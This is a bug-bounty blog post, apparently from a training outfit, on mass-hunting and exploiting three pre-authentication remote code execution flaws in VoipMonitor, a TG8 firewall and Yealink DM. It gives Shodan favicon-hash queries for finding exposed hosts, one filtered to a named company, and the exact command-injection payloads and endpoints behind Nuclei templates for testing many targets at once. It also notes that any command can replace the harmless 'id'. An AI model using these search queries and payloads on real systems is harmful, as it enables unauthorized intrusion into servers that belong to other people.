3 Pre-Auth RCE’s in YeaLink DM, VoipMonitor, TG8 Firewall
A Tale of 3 Pre-Auth RCE’s.
Hello Everyone, In this blog we are going to see How to Identify, Mass
hunt and Exploit Three Pre-Auth RCE’s on different Softwares and write nuclei templates for them.
TL,DR
Enough of talking, Let’s start!
Identification of VoiPMonitor: (CVE-2021–30461)
Shodan:
Search Query : http.favicon.hash:-124234705
What is the Hash?
Favicon hashes is the awesome way to identify targets running the version of software or CMS on them. We convert the favicon into hash and use that for search for specific results using shodan.
Results: 8
Only name of the software, without favicon hash
Results with favicon hash : 615
http.favicon.hash:-124234705
To Hunt for Specific Organisation
Search Query: http.favicon.hash:-124234705 org:”Microsoft Corporation”
Censys:
Search Query : VoipMonitor
Enumerating targets from shodan using CLI
Writing Nuclei Template: CVE-2021–30461
Now we have the IP Address running the VoipMonitor, and we can further test them for the vulnerability.
We are going to now write a nuclei template to test all of them together in one go.
Vulnerable Endpoint :
We will send a POST Request on endpoint /index.php with body
SPOOLDIR=test%22.system%28id%29.%22
Vulnerable Parameter :
SPOOLDIR=
shifa@Mac-Book-Pro% cat cve-2021–30461-preauth-rce.yaml
Breakdown of Template :
requests : This signifies the type of request, Here POST with endpoint of the target
POST ‘/index.php’
BODY “SPOOLDIR=test%22.system%28id%29.%22”
Note: URL decoded version — test”.system(id).” We are executing the id command
Matchers: This signifies the matching condition with the payload-
‘uid’, ‘gid’, ‘groups’”
matchers-condition: This signifies the condition that our template should match status code 200 in response and our payload as seen above.
Running Nuclei Template
Template Link: https://github.com/shifa123/mytemplates/tree/main
Writing Nuclei Template G8 Firewall PreAuth RCE: CVE Pending
Identification can be done in the same way using shodan,censys as shown above.
We are going to now write a nuclei template to test all of them together in one go.
Vulnerable Endpoint :
We will send a POST Request on endpoint /admin/runphpcmd.php with body
syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bid%3B++local
Vulnerable Parameter :
syscmd=
shifa@Mac-Book-Pro% cat tg8-pre-auth-rce.yaml
Breakdown of Template :
requests : This signifies the type of request, Here POST with endpoint of the target
POST ‘http://{{Hostname}}/admin/runphpcmd.php’
BODY syscmd=sudo+%2Fhome%2FTG8%2Fv3%2Fsyscmd%2Fcheck_gui_login.sh+%3Bid%3B++local
Note: URL decoded version — ;id; This is the command we will execute
Matchers: This signifies the matching condition with the payload-
‘uid’, ‘gid’, ‘groups’”
matchers-condition: This signifies the condition that our template should match status code 200 in response and our payload as seen above.
Running Nuclei Template
Writing Nuclei Template YeaLink DM PreAuth RCE: (CVE-2021–27561/27562)
Identification can be done in the same way using shodan,censys as shown above.
We are going to now write a nuclei template to test all of them together in one go.
Vulnerable Endpoint :
We will send a GET Request on endpoint https://{{BaseURL}}/premise/front/getPingData?url=http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;
Vulnerable Parameter :
zone=
shifa@Mac-Book-Pro% cat CVE-2021–27562.yaml
Breakdown of Template :
requests : This signifies the type of request, Here GET with endpoint of the target
GET ‘http://{{Hostname}}/premise/front…?zone=;usr/bin/id;’
Note: Command executed here is id, you can execute anything else to confirm /etc/passwd as well. I’m not downloading sensitive files from server for demonstration
Matchers: This signifies the matching condition with the payload-
‘uid’, ‘gid’, ‘groups’”
matchers-condition: This signifies the condition that our template should match status code 200 in response and our payload as seen above.
Running Nuclei Template
Reporting the Vulnerability
Found the vulnerability in targets and want to send a report, We have got your covered. Copy and Use the ready made reporting templates at https://hacktify.in/bugbounty to invest more time in hunting and not in reporting.
Loved reading this, We teach more such techniques in our Bug Bounty for Beginners Crash Course. 💯🎉🔥
✅Crash Course Details Here -✅
https://hacktify.in/bugbountycrashcourse
